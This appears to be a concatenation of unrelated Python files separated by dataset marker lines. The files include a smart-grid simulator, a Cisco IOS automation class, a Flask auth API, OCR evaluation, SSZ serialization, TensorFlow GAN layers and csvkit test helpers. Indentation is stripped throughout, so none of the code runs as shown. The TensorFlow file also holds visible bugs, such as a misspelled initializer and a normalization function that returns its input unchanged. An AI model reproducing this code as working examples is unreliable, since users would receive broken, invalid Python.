s=name.split(" ")
print("The first name is:",s[0])
if len(s)==3:
print("The middle name is:",s[1])
print("The last name is:", s[2])
else:
print("The last name is:", s[1])
|
nilq/baby-python
|
python
|
from typing import Tuple, Optional
from abc import ABC, abstractmethod
from mercury.msg.smart_grid import ElectricityOffer
from xdevs.models import Atomic, Port, PHASE_PASSIVE, INFINITY
from mercury.utils.history_buffer import EventHistoryBuffer
class EnergyProvider(Atomic, ABC):
def __init__(self, **kwargs):
self.provider_id: str = kwargs['provider_id']
self.actual_offer: Optional[float] = None
self.eventual_offer: Optional[float] = None
self.next_timeout: float = INFINITY
self._clock: float = 0
super().__init__('smart_grid_provider_{}'.format(self.provider_id))
self.out_electricity_offer = Port(ElectricityOffer, 'out_electricity_offer')
self.add_out_port(self.out_electricity_offer)
def deltint(self):
self._clock += self.sigma
self.actual_offer = self.eventual_offer
self.eventual_offer, self.next_timeout = self.schedule_next_offer()
self.hold_in(PHASE_PASSIVE, self.next_timeout)
def deltext(self, e):
self._clock += e
self.next_timeout -= e
self.hold_in(PHASE_PASSIVE, self.next_timeout)
def lambdaf(self):
self.out_electricity_offer.add(ElectricityOffer(self.provider_id, self.eventual_offer))
def initialize(self):
self.hold_in(PHASE_PASSIVE, 0)
def exit(self):
pass
def get_next_timeout(self):
return self.next_timeout
@abstractmethod
def schedule_next_offer(self) -> Tuple[Optional[float], float]:
""":return: tuple (new eventual offer, time to wait before publishing new offer)"""
pass
class EnergyProviderStatic(EnergyProvider):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.eventual_offer = kwargs.get('offer', None)
def schedule_next_offer(self) -> Tuple[Optional[float], float]:
return self.actual_offer, INFINITY
class EnergyProviderHistory(EnergyProvider):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.offer_column = kwargs.get('offer_column', 'offer')
self.buffer = EventHistoryBuffer(**kwargs)
if not self.buffer.column_exists(self.offer_column):
raise ValueError('dataframe does not have the mandatory column {}'.format(self.offer_column))
self.eventual_offer = self.buffer.initial_val[self.offer_column].item()
def schedule_next_offer(self) -> Tuple[float, float]:
eventual = self.actual_offer
next_time = self._clock
while eventual == self.actual_offer and next_time < INFINITY:
eventual = self.buffer.get_event()[self.offer_column].item()
next_time = self.buffer.time_of_next_event()
self.buffer.advance()
return eventual, next_time - self._clock
|
nilq/baby-python
|
python
|
from abc import abstractmethod
from dataclasses import dataclass
from typing import List, Any, Callable, Dict, Tuple, NamedTuple, Union
from data_splitting import split_splits, LearnCurveJob, EvalJob
from seq_tag_util import calc_seqtag_f1_scores, Sequences
from util.worker_pool import GenericTask
@dataclass
class Experiment:
name: str
num_folds: int
jobs: List[LearnCurveJob]
score_task: GenericTask
def __str__(self):
return str({k: v for k, v in self.__dict__.items() if k not in ["jobs"]})
Splits = Dict[str, List[int]]
class SeqTagTaskData(NamedTuple):
data: Dict[str, List]
task_data: Any
class SeqTagScoreTask(GenericTask):
def __init__(self, params, data_supplier: Callable) -> None:
task_params = {"params": params, "data_supplier": data_supplier}
super().__init__(**task_params)
@staticmethod
@abstractmethod
def build_task_data(**task_params) -> SeqTagTaskData:
raise NotImplementedError
@classmethod
def process(cls, job: EvalJob, task_data: SeqTagTaskData):
splits = split_splits(job, task_data.data)
predictions = cls.predict_with_targets(splits, task_data.task_data)
return {
split_name: calc_seqtag_f1_scores(preds, targets)
for split_name, (preds, targets) in predictions.items()
}
@classmethod
@abstractmethod
def predict_with_targets(
cls, splits:Splits, params
) -> Dict[str, Tuple[Sequences, Sequences]]:
raise NotImplementedError
|
nilq/baby-python
|
python
|
from SeeThru_Feeds.Model.Attribution import Attribution
from SeeThru_Feeds.Model.Properties.Properties import *
from SeeThru_Feeds.Model.Properties.PropertyManager import PropertyManager
class ComponentBase(PropertyManager, Attribution):
def component_execute(self):
"""
This function should be overridden by a subclass
This is where your component should start executing
Raises:
NotImplementedError: There is no execution method defined, please define it with 'component_execute'
"""
raise NotImplementedError("There is no execution method defined, please define it with 'component_execute'")
def run(self):
"""
This method will call the sub class' component_execute method
This is the only way a component should be executed as it
ensures that the properties of the component are valid
Returns:
ComponentBase: The component
"""
self.check_fillables()
# The fillable properties passed their parsing, therefore the component can be executed
self.component_execute()
return self
|
nilq/baby-python
|
python
|
'''
Copyright 2021 Kyle Kowalczyk
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from CiscoAutomationFramework.FirmwareBase import CiscoFirmware
from time import sleep
class IOS(CiscoFirmware):
@property
def uptime(self):
self.cli_to_privileged_exec_mode()
self.terminal_length('0')
device_output = self.transport.send_command_get_output('show version')
for line in device_output.splitlines():
if f'{self.transport.hostname.lower()} uptime' in line.lower():
return ' '.join(line.split()[3:])
return None
@property
def interfaces(self):
self.cli_to_privileged_exec_mode()
self.terminal_length('0')
raw_data = self.transport.send_command_get_output('show interfaces', buffer_size=500)
try:
parsed_data = [x.split()[0] for x in raw_data[2:-2] if not x.startswith(' ')]
except IndexError as _:
raise IndexError('Unexpected data from device, Unable to extract interface names from "show interfaces" command!')
return parsed_data
@property
def mac_address_table(self):
self.cli_to_privileged_exec_mode()
self.terminal_length('0')
raw_mac = self.transport.send_command_get_output('show mac address-table')
return '\n'.join(raw_mac[6:-2])
@property
def arp_table(self):
self.cli_to_privileged_exec_mode()
self.terminal_length('0')
raw_arp = self.transport.send_command_get_output('show ip arp')
return '\n'.join(raw_arp[2:-1])
@property
def running_config(self):
self.cli_to_privileged_exec_mode()
self.terminal_length('0')
running_config = self.transport.send_command_get_output('show running-config', buffer_size=100)
# if the running config grabbed is less than 4 lines and the prompt is not in the last 4 lines of the config
while len(running_config) < 4 and not any([True if self.prompt in x else False for x in reversed(running_config[-4:])]):
running_config += self.transport.get_output(buffer_size=100, no_command_sent_previous=True)
sleep(.1)
return '\n'.join(running_config[2:-2])
@property
def startup_config(self):
self.cli_to_privileged_exec_mode()
self.terminal_length('0')
config = self.transport.send_command_get_output('show startup-config', buffer_size=100)
while len(config) < 4 and not any([True if self.prompt in x else False for x in reversed(config[-4:])]):
config += self.transport.get_output(buffer_size=100, no_command_sent_previous=True)
sleep(.1)
return '\n'.join(config[2:-2])
def _terminal_length(self, n='0'):
self.cli_to_privileged_exec_mode()
return self.transport.send_command_get_output(f'terminal length {n}')
def _terminal_width(self, n='0'):
self.cli_to_privileged_exec_mode()
return self.transport.send_command_get_output(f'terminal width {n}')
def save_config(self):
self.cli_to_privileged_exec_mode()
self.transport.send_command('copy running-config startup-config')
data = self.transport.send_command_get_output('', timeout=15)
# if the prompt is in the last line of output and there is not a percent sign in any line of output we will
# interpret that as a succesful save
if self.transport.prompt in ''.join(data[-1:]) and not any('%' in line for line in data):
return True
return False
def add_local_user(self, username, password, password_code=0, *args, **kwargs):
kwarg_string = ' '.join([f'{key} {value}' for key, value in kwargs.items()])
command_string = f'username {username} {" ".join(args)} {kwarg_string} secret {password_code} {password}'
self.cli_to_config_mode()
return self.transport.send_command_get_output(command_string)
def delete_local_user(self, username):
self.cli_to_config_mode()
self.transport.send_command(f'no username {username}')
return self.transport.send_command_get_output('')
|
nilq/baby-python
|
python
|
# Copyright (c) 2019, MD2K Center of Excellence
# - Nasir Ali <nasir.ali08@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
from flask import request
from flask_restx import Namespace, Resource
from .. import CC, apiserver_config
from ..core.data_models import user_login_model, user_register_model, error_model, auth_token_resp_model, \
user_settings_resp_model, user_registration_resp_model
from ..core.decorators import auth_required
auth_route = apiserver_config['routes']['user']
auth_api = Namespace(auth_route, description='Authentication service')
@auth_api.route('')
class Auth(Resource):
def get(self):
return {"message": "user route is working"}, 200
@auth_api.route('/<study_name>/register')
class Auth(Resource):
@auth_api.doc('')
@auth_api.expect(user_register_model(auth_api), validate=True)
@auth_api.response(400, 'All fields are required.', model=error_model(auth_api))
@auth_api.response(401, 'Invalid credentials.', model=error_model(auth_api))
@auth_api.response(200, 'User registration successful.', model=user_registration_resp_model(auth_api))
def post(self, study_name):
'''Post required fields (username, password, user_role, user_metadata, user_settings) to register a user'''
try:
username = request.get_json().get('username', None).strip()
user_password = request.get_json().get('password', None).strip()
#study_name = request.get_json().get('study_name', None).strip()
user_role = request.get_json().get('user_role', None).strip()
user_metadata = request.get_json().get('user_metadata', None)
user_settings = request.get_json().get('user_settings', None)
status = CC.get_or_create_instance(study_name=study_name).create_user(username, user_password, user_role, user_metadata, user_settings, encrypt_password=True)
if status:
return {"message": str(username) + " is created successfully."}, 200
else:
return {"message": "Cannot create, something went wrong."}, 400
except (ValueError, Exception) as err:
return {"message": str(err)}, 400
@auth_api.route('/<study_name>/login')
class Auth(Resource):
@auth_api.doc('')
@auth_api.expect(user_login_model(auth_api), validate=True)
@auth_api.response(400, 'User name and password cannot be empty.', model=error_model(auth_api))
@auth_api.response(401, 'Invalid credentials.', model=error_model(auth_api))
@auth_api.response(200, 'Authentication is approved', model=auth_token_resp_model(auth_api))
def post(self, study_name):
"""
authenticate a user
"""
username = request.get_json().get('username', None)
password = request.get_json().get('password', None)
if not username or not password:
return {"message": "User name and password cannot be empty."}, 401
login_status = CC.get_or_create_instance(study_name=study_name).connect(username, password, encrypt_password=True)
if login_status.get("status", False) == False:
return {"message": login_status.get("msg", "no-message-available")}, 401
token = login_status.get("auth_token")
user_uuid = CC.get_or_create_instance(study_name=study_name).get_user_id(username)
access_token = {"auth_token": token, 'user_uuid': user_uuid}
return access_token, 200
@auth_api.route('/<study_name>/config')
class Auth(Resource):
@auth_api.doc('')
@auth_required
@auth_api.header("Authorization", 'Bearer <JWT>', required=True)
@auth_api.response(400, 'Authorization code cannot be empty.', model=error_model(auth_api))
@auth_api.response(401, 'Invalid credentials.', model=error_model(auth_api))
@auth_api.response(200, 'Request successful', model=user_settings_resp_model(auth_api))
def get(self, study_name):
'''Post required fields (username, password, user_role, user_metadata, user_settings) to register a user'''
token = request.headers['Authorization']
token = token.replace("Bearer ", "")
try:
user_settings = CC.get_or_create_instance(study_name=study_name).get_user_settings(auth_token=token)
return {"user_settings": json.dumps(user_settings)}
except Exception as e:
return {"message", str(e)}, 400
|
nilq/baby-python
|
python
|
import pytesseract
import jiwer
from PIL import Image
from os import listdir
from os.path import join, isfile
TEST_PATH = '/train/tesstrain/data/storysquad-ground-truth'
extractions = []
ground_truths = []
count = 0
for file_name in listdir(TEST_PATH):
file_path = join(TEST_PATH, file_name)
if count < 100 and file_path.endswith(".png") and isfile(file_path):
extraction = pytesseract.image_to_string(
Image.open(file_path),
lang='kaggle',
config='--tessdata-dir "/train/tessdata"' # set in top level Dockerfile on L72
)
ground_truth = None
ground_truth_path = file_path.replace(".png", ".gt.txt")
if isfile(ground_truth_path):
with open(ground_truth_path, mode='r') as f:
ground_truth = f.read()
extractions.append(extraction)
ground_truths.append(ground_truth)
count += 1
else:
continue
word_error_rate = jiwer.wer(
ground_truths,
extractions,
)
print(f"Model had word error rate of {100 * word_error_rate}%")
char_error_rate = jiwer.cer(
ground_truths,
extractions,
)
print(f"Model had char error rate of {100 *char_error_rate}%")
|
nilq/baby-python
|
python
|
from typing import (
IO,
Any,
Iterable,
Sequence,
Tuple,
)
from eth_utils import (
ValidationError,
to_tuple,
)
from eth_utils.toolz import (
sliding_window,
)
from ssz.exceptions import (
DeserializationError,
SerializationError,
)
from ssz.sedes.base import (
CompositeSedes,
TSedes,
)
from ssz.utils import (
merkleize,
read_exact,
s_decode_offset,
)
@to_tuple
def _deserialize_fixed_size_items_and_offsets(stream, field_sedes):
for sedes in field_sedes:
if sedes.is_fixed_sized:
field_size = sedes.get_fixed_size()
field_data = read_exact(field_size, stream)
yield (sedes.deserialize(field_data), sedes)
else:
yield (s_decode_offset(stream), sedes)
class Container(CompositeSedes[Sequence[Any], Tuple[Any, ...]]):
def __init__(self, field_sedes: Sequence[TSedes]) -> None:
if len(field_sedes) == 0:
raise ValidationError("Cannot define container without any fields")
self.field_sedes = tuple(field_sedes)
#
# Size
#
@property
def is_fixed_sized(self):
return all(field.is_fixed_sized for field in self.field_sedes)
def get_fixed_size(self):
if not self.is_fixed_sized:
raise ValueError("Container contains dynamically sized elements")
return sum(field.get_fixed_size() for field in self.field_sedes)
#
# Serialization
#
def _get_item_sedes_pairs(self,
value: Sequence[Any],
) -> Tuple[Tuple[Any, TSedes], ...]:
return tuple(zip(value, self.field_sedes))
def _validate_serializable(self, value: Sequence[Any]) -> bytes:
if len(value) != len(self.field_sedes):
raise SerializationError(
f"Incorrect element count: Expected: {len(self.field_sedes)} / Got: {len(value)}"
)
#
# Deserialization
#
def deserialize_fixed_size_parts(self,
stream: IO[bytes],
) -> Iterable[Tuple[Tuple[Any], Tuple[int, TSedes]]]:
fixed_items_and_offets = _deserialize_fixed_size_items_and_offsets(
stream,
self.field_sedes,
)
fixed_size_values = tuple(
item
for item, sedes
in fixed_items_and_offets
if sedes.is_fixed_sized
)
offset_pairs = tuple(
(item, sedes)
for item, sedes
in fixed_items_and_offets
if not sedes.is_fixed_sized
)
return fixed_size_values, offset_pairs
@to_tuple
def deserialize_variable_size_parts(self,
offset_pairs: Tuple[Tuple[int, TSedes], ...],
stream: IO[bytes]) -> Iterable[Any]:
offsets, fields = zip(*offset_pairs)
*head_fields, last_field = fields
for sedes, (left_offset, right_offset) in zip(head_fields, sliding_window(2, offsets)):
field_length = right_offset - left_offset
field_data = read_exact(field_length, stream)
yield sedes.deserialize(field_data)
# simply reading to the end of the current stream gives us all of the final element data
final_field_data = stream.read()
yield last_field.deserialize(final_field_data)
def _deserialize_stream(self, stream: IO[bytes]) -> Tuple[Any, ...]:
if not self.field_sedes:
# TODO: likely remove once
# https://github.com/ethereum/eth2.0-specs/issues/854 is resolved
return tuple()
fixed_size_values, offset_pairs = self.deserialize_fixed_size_parts(stream)
if not offset_pairs:
return fixed_size_values
variable_size_values = self.deserialize_variable_size_parts(offset_pairs, stream)
fixed_size_parts_iter = iter(fixed_size_values)
variable_size_parts_iter = iter(variable_size_values)
value = tuple(
next(fixed_size_parts_iter) if sedes.is_fixed_sized else next(variable_size_parts_iter)
for sedes
in self.field_sedes
)
# Verify that both iterables have been fully consumed.
try:
next(fixed_size_parts_iter)
except StopIteration:
pass
else:
raise DeserializationError("Did not consume all fixed size values")
try:
next(variable_size_parts_iter)
except StopIteration:
pass
else:
raise DeserializationError("Did not consume all variable size values")
return value
#
# Tree hashing
#
def hash_tree_root(self, value: Tuple[Any, ...]) -> bytes:
merkle_leaves = tuple(
sedes.hash_tree_root(element)
for element, sedes in zip(value, self.field_sedes)
)
return merkleize(merkle_leaves)
|
nilq/baby-python
|
python
|
import pytest
from lendingblock.const import Side, OrderType, Ccy
@pytest.fixture
async def wallets_org_id(lb, org_id):
for ccy in Ccy.BTC.name, Ccy.ETH.name, Ccy.LND.name:
await lb.execute(
f'organizations/{org_id}/wallets',
'POST',
json={
'address': f'{org_id}{ccy}',
'currency': ccy,
}
)
return org_id
@pytest.fixture
async def order_id(lb, wallets_org_id):
order_data = {
'org_id': wallets_org_id,
'type': OrderType.limit.name,
'side': Side.lend.name,
'tenor': '1d',
'amount': 10.0,
'currency': Ccy.BTC.name,
'price': 2.0,
}
order = await lb.execute('orders', 'POST', json=order_data)
return order['id']
async def test_create(lb, wallets_org_id):
order_data = {
'org_id': wallets_org_id,
'type': OrderType.limit.name,
'side': Side.lend.name,
'tenor': '1d',
'amount': 10.0,
'currency': Ccy.BTC.name,
'price': 2.0,
}
resp = await lb.orders.create(order_data)
assert 'id' in resp
async def test_get(lb, order_id):
resp = await lb.orders.get(order_id)
assert resp['id'] == order_id
async def test_get_list(lb, order_id):
resp = await lb.orders.get_list()
assert order_id in [order['id'] for order in resp]
async def test_delete(lb, order_id):
await lb.orders.delete(order_id)
all_orders = await lb.execute('orders')
assert order_id not in all_orders
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import tensorflow as tf
import scipy
import cPickle
import os
import glob
import random
import imageio
import scipy.misc as misc
log_device_placement = True
allow_soft_placement = True
gpu_options = 0.9 #multi-gpu
batch_size = 50
image_shape = [28*28]
z_dim = 30 #latent space reprsentation z proposed in the paper
gf_dim = 16
df_dim = 16
lr = 0.005
beta1 = 0.5
def batch_norm(x, is_training, epsilon=1e-5, decay=0.9, scope="batch_norm"):
out = tf.contrib.layers.batch_norm(x, decay=decay, updates_collections=None, epsilon=epsilon,
scale=True, is_training=is_training, scope=scope)
return out
def conv(x, filter_size, stride_width, stride_height, feature_in, feature_out, scope="conv2d",log_device_placement=True):
with tf.variable_scope(scope):
w = tf.get_variable("w", [filter_size, filter_size, feature_in, feature_out],
initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b", [feature_out], initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(x, w, strides=[1, stride_width, stride_height, 1], padding='SAME') + b
return conv
def deconv(x, filter_size, stride_width, stride_height, feature_out, scope="deconv2d",log_device_placement=True):
with tf.variable_scope(scope):
w = tf.get_variable("w", [filter_size, filter_size, feature_out[-1], x.get_shape()[-1]],
initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b", [feature_out[-1]], initializer=tf.constant_intializer(0.0))
deconv = tf.nn.conv2d_transpose(x, w, strides=[1, stride_width, stride_height, 1], output_shape=feature_out) + b
return deconv
def leakyrelu(x, leak=0.2, name='lrelu'):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
out = f1 * x + f2 * abs(x)
return out
def fc_layer(x, feature_in, feature_out, scope=None, with_w = False):
with tf.variable_scope(scope or "Linear"):
weights = tf.get_variable("weights", shape=[feature_in, feature_out], dtype=tf.float32,
initializer=tf.truncated_normal_initializer(stddev=0.02))
bias = tf.get_variable("bias", shape=[feature_out], dtype=tf.float32,
initializer=tf.constant_initializer(0.0))
if with_w:
return tf.matmul(x, weights) + bias, weights, bias
else:
return tf.matmul(x, weights) + bias
def init_embedding(size, dimension, stddev=0.01, scope="Embedding"):
with tf.variable_scope(scope):
return tf.get_variable("E", shape=[size, 1, 1, dimension], dtype=tf.float32,
initializer=tf.truncated_normal_initializer(stddev=stddev))
def merge(image, size):
height, width, channel = image[1], image[2], image[3]
img = np.zeros(height * size[0], width * size[1], channel)
print(img.shape)
for i, j in enumerate(image):
index = i % size[1]
jndex = j / size[2]
img[jndex*height:jndex*height + height, index*width:index*width + width] = image
#or img[jndex*height:jndex*height + height, index*width:index*width+width, :] = image
return img
def image_norm(image):
normalized = (image/127.5) - 1
return image
#def dense_batch_norm(x, number_out, phase_train, name='bn'): #BN necessary?
#beta = tf.get_variable(name + '/fc_beta', shape=[number_out], initializer=tf.constant_initializer(0.0))
#gamma = tf.get_variable(name + 'fc_gamma', shape=[number_out], initializer=tf.random_normal_initializer(mean=1.0, stddev=0.02))
#batch_mean, batch_var = tf.nn.moments(x, [0], name=name + '/fc_moments')
#ema = tf.train.ExponentialMovingAverage(decay=0.9)
#def mean_var_update():
# ema_apply_op = ema.apply([batch_mean, batch_var])
# with tf.control_dependencies(ema_apply_op):
# return tf.identity(batch_mean), tf.identity(batch_var)
#mean ,var = tf.cond(name=phase_train, mean_var_update, lambda: (ema.average(batch_mean), ema.average(batch_var)))
#normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-5)
#return normed
#def global_batch_norm(x, number_out, phase_train, name='bn'): #BN necessary?
#beta = tf.get_variable(name + '/beta', shape=[number_out], initializer=tf.constant_initializer(0.0))
#gamma = tf.get_variable(name + '/gamma', shape=[number_out], initializer=tf.random_normal_initializer(mean=1.0, stddev=0.02))
#batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name=name + '/moments')
#ema = tf.train.ExponentialMovingAverage(decay=0.9)
#def mean_var_update():
# ema_apply_op = ema.apply([batch_mean, batch_var])
# with tf.control_dependencies(ema_apply_op):
# return tf.identity(batch_mean), tf.identity(batch_var)
#mean, var = tf.cond(name=phase_train, mean_var_update, lambda: (ema.average(batch_mean), ema.average(batch_var)))
#normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-5)
#return normed
def mini_batch_dis(x, num_kernels=100, dim_kernel=5, init=False, name='MD'): #decrease mode loss
num_inputs = df_dim*4
theta = tf.get_variable(name+'/theta', [num_inputs, num_kernels, dim_kernel], initializer=tf.random_normal_initializer(stddev=0.05))
log_weight_scale = tf.get_variable(name+'/lws', [num_kernels, dim_kernel], initializer=tf.constant_initializer(0.0))
W = tf.matmul(theta, tf.expand_dims(tf.exp(log_weight_scale)/tf.sqrt(tf.reduce_sum(tf.square(theta),0)), 0))
W = tf.reshape(W,[-1, num_kernels*dim_kernel])
x = tf.reshape(x, [batch_size, num_inputs])
ac = tf.reshape(tf.matmul(x, W), [-1, num_kernels, dim_kernel])
diff = tf.matmul(tf.reduce_sum(tf.abs(tf.sub(tf.expand_dims(ac, 3), tf.expand_dims(tf.transpose(ac, [1, 2, 0]),0))), 2),
1-tf.expand_dims(tf.constant(np.eye(batch_size), dtype=np.float32), 1))
out = tf.reduce_sum(tf.exp(-diff),2) / tf.reduce_sum(tf.exp(-diff))
return tf.concat([x, diff], 1)
def conv2d(x, output_filters, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope="conv2d"):
with tf.variable_scope(scope):
shape = x.get_shape().as_list()
W = tf.get_variable('W', [kh, kw, shape[-1], output_filters],
initializer=tf.truncated_normal_initializer(stddev=stddev))
#print(W.shape) (5, 5, 3, 64)
b = tf.get_variable('b', [output_filters], initializer=tf.constant_initializer(0.0))
W_conv = tf.nn.conv2d(x, W, strides=[1, sh, sw, 1], padding='SAME')
return tf.reshape(tf.nn.bias_add(W_conv, b), W_conv.get_shape())#reshape depends
def deconv2d(x, output_shape, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope="deconv2d"):
with tf.variable_scope(scope):
input_shape = x.get_shape().as_list()
w = tf.get_variable('w', [kh, kw, output_shape[-1], input_shape[-1]],
initializer=tf.truncated_normal_initializer(stddev=stddev))
b = tf.get_variable('b', [output_shape[-1]], initializer=tf.constant_initializer(0.0))
w_deconv = tf.nn.conv2d_transpose(x, w, output_shape=output_shape, strides=[1, sh, sw, 1])
return tf.reshape(tf.nn.bias_add(w_deconv, b), w_deconv.get_shape())
def batch_norm(x, is_training, epsilon=1e-5, decay=0.9, scope="batch_norm"):
return tf.contrib.layers.batch_norm(x, decay=decay, updates_collections=None, epsilon=epsilon,
scale=True, is_training=is_training, scope=scope)
#----------------------unit-test for conv&deconv
reader = tf.WholeFileReader()
directory = tf.train.string_input_producer(['/home/linkwong/Zeroshot-GAN/model/image.png'])
key, value = reader.read(directory)
image_tensor = tf.image.decode_png(value)
initialize = tf.global_variables_initializer()
generator_dim = 64
discriminator_dim = 64
output_width = 256
with tf.Session() as sess:
sess.run(initialize)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(1):
image = image_tensor.eval()
image = tf.image.resize_images(image, [256, 256]) #resize the image into 256*256
print(image.shape)
image_ten = tf.convert_to_tensor(image, tf.float32) #convert the image into tensor
print(image_ten.shape)
coord.request_stop()
coord.join(threads)
image_ten = tf.expand_dims(image_ten, 0) #(1, 256, 256, 3)
image_conv_1 = conv2d(image_ten, generator_dim, scope="conv_1") #(1, 128, 128, 64)
image_conv_2 = conv2d(image_conv_1, generator_dim*2, scope="conv_2")#(1, 64, 64, 128)
image_conv_3 = conv2d(image_conv_2, generator_dim*4, scope="conv_3")#(1, 32, 32, 256)
image_conv_4 = conv2d(image_conv_3, generator_dim*8, scope="conv_4")#(1, 16, 16, 512)
image_conv_5 = conv2d(image_conv_4, generator_dim*8, scope="conv_5")#(1, 8, 8, 512)
image_conv_6 = conv2d(image_conv_5, generator_dim*8, scope="conv_6")#(1, 4, 4, 512)
image_conv_7 = conv2d(image_conv_6, generator_dim*8, scope="conv_7")#(1, 2, 2, 512)
image_conv_8 = conv2d(image_conv_7, generator_dim*8, scope="conv_8")#(1, 1, 1, 512)
#print(image_conv_8.shape)
image_deconv_8 = deconv2d(image_conv_8, [1, 2, 2, generator_dim*8], scope="deconv_8")#(1, 2, 2, 512)
image_deconv_7 = deconv2d(image_deconv_8, [1, 4, 4, generator_dim*8], scope="deconv_7")#(1, 4, 4, 512)
image_deconv_6 = deconv2d(image_deconv_7, [1, 8, 8, generator_dim*8], scope="deconv_6")#(1, 8, 8, 512)
image_deconv_5 = deconv2d(image_deconv_6, [1, 16, 16, generator_dim*8], scope="deconv_5")#(1, 16, 16, 512)
image_deconv_4 = deconv2d(image_deconv_5, [1, 32, 32, generator_dim*4], scope="deconv_4")#(1, 32, 32, 256)
image_deconv_3 = deconv2d(image_deconv_4, [1, 64, 64, generator_dim*2], scope="deconv_3")#(1, 64, 64, 128)
image_deconv_2 = deconv2d(image_deconv_3, [1, 128, 128, generator_dim], scope="deconv_2")#(1, 128, 128, 64)
image_deconv_1 = deconv2d(image_deconv_2, [1, 256, 256, 3], scope="deconv_1")
#print(image_deconv_1.shape)
|
nilq/baby-python
|
python
|
from flask_wtf import FlaskForm
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from wtforms import TextField, TextAreaField, SubmitField, validators, ValidationError,StringField, PasswordField, SubmitField, BooleanField
class LoginForm(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
submit = SubmitField('Login')
|
nilq/baby-python
|
python
|
#
# Copyright (c) 2020 Carsten Igel.
#
# This file is part of puckdb
# (see https://github.com/carstencodes/puckdb).
#
# License: 3-clause BSD, see https://opensource.org/licenses/BSD-3-Clause
#
import unittest
import tempfile
import os
import time
import puckdb
class BasicTest(unittest.TestCase):
def test_no_crash(self):
with tempfile.TemporaryDirectory() as tmp_dir:
file: str = os.path.join(str(tmp_dir), "test.db")
db = puckdb.PuckDB(file, True, False)
db.set("test", 1)
time.sleep(2) # Wait for worker to complete
db2 = puckdb.PuckDB(file, False, False)
value = db2.get("test")
print(db2.getall())
self.assertEqual(value, 1)
if __name__ == "__main__":
unittest.main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Inherits the stuff from tests.csvk – i.e. csvkit.tests.utils
"""
from tests.csvk import *
from tests.csvk import CSVKitTestCase as BaseCsvkitTestCase
import unittest
from unittest.mock import patch
from unittest import skip as skiptest
from unittest import TestCase
import warnings
from io import StringIO
from parameterized import parameterized
from subprocess import Popen, PIPE # soon to be deprecated
from subprocess import check_output as sub_check_output
import sys
from typing import List as ListType, Optional as OptionalType
from csvmedkit import agate
from csvmedkit.exceptions import *
warnings.filterwarnings("ignore", category=DeprecationWarning)
class CmkTestCase(BaseCsvkitTestCase):
def cmd_output(self, command: str) -> str:
output = sub_check_output(command, shell=True, stderr=sys.stderr)
return output.decode("utf-8")
def assertCmdLines(self, command: str, rows, newline_at_eof=True):
lines = self.cmd_output(command).split("\n")
if newline_at_eof:
rows.append("")
for i, row in enumerate(rows):
self.assertEqual(lines[i], row)
self.assertEqual(len(lines), len(rows))
# TODO: probably will deprecate pipe_output and assertPipedLines for being too
# clunky for my tastes
def pipe_output(self, commands: ListType[str]) -> OptionalType[str]:
"""
each command is a list of strings, representing a command and argument, e.g.
['head', '-n', '5', 'examples/dummy.csv'],
['csvflatten', '-P'],
"""
output = None # StringIO()
cmdcount = len(commands)
pipes = []
for i, cmd in enumerate(commands, 1):
if i == 1:
p = Popen(cmd, stdout=PIPE)
elif i == cmdcount:
pass # manually instantiate last command with context manager
else:
p = Popen(cmd, stdin=pipes[-1].stdout, stdout=PIPE)
pipes.append(p)
with Popen(commands[-1], stdin=pipes[-1].stdout, stdout=PIPE) as foo:
output = foo.communicate()[0].decode("utf-8")
foo.kill()
# pipes[0].stdout.close()
for p in pipes:
p.wait()
p.stdout.close()
# p.kill()
return output
def pipe_output_as_list(self, commands) -> ListType[str]:
return self.pipe_output(commands).split("\n")
def assertPipedLines(self, commands, rows, newline_at_eof=True):
lines = self.pipe_output_as_list(commands)
if newline_at_eof:
rows.append("")
for i, row in enumerate(rows):
self.assertEqual(lines[i], row)
self.assertEqual(len(lines), len(rows))
|
